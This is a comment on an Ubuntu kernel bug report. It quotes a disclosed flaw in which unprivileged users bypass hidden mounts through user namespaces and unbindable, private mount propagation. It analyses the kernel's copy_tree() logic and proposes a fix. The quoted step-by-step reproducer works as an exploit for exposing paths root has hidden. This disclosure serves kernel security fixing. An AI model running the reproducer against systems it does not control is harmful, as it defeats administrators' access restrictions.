Comment 4 for bug 1789161

> Bug description:
> Jonathan Calmels from NVIDIA reported that he's able to bypass the
> mount visibility security check in place in the Linux kernel by using
> a combination of the unbindable property along with the private mount
> propagation option to allow a unprivileged user to see a path which
> was purposefully hidden by the root user.

So what we think happens is that copy_tree() simply skips unbindable mounts.

   for (s = r; s; s = next_mnt(s, r)) {
   if (!(flag & CL_COPY_UNBINDABLE) &&
       IS_MNT_UNBINDABLE(s)) {
    s = skip_mnt_tree(s);
    continue;
   }

The solution that just quickly springs to my mind - and I might be
totally wrong - is to not skip unbindable mounts when MNT_LOCKED is set.

>
> Reproducer:
> # Hide a path to all users using a tmpfs
> root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
> root@castiana:~#
>
> # As an unprivileged user, unshare user namespace and mount namespace
> stgraber@castiana:~$ unshare -U -m -r
>
> # Confirm the path is still not accessible
> root@castiana:~# ls /sys/devices/
>
> # Make /sys recursively unbindable and private
> root@castiana:~# mount --make-runbindable /sys
> root@castiana:~# mount --make-private /sys
>
> # Recursively bind-mount the rest of /sys over to /mnnt
> root@castiana:~# mount --rbind /sys/ /mnt
>
> # Access our hidden /sys/device as an unprivileged user
> root@castiana:~# ls /mnt/devices/
> breakpoint cpu cstate_core cstate_pkg i915 intel_pt isa kprobe LNXSYSTM:00 msr pci0000:00 platform pnp0 power software system tracepoint uncore_arb uncore_cbox_0 uncore_cbox_1 uprobe virtual
>
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+subscriptions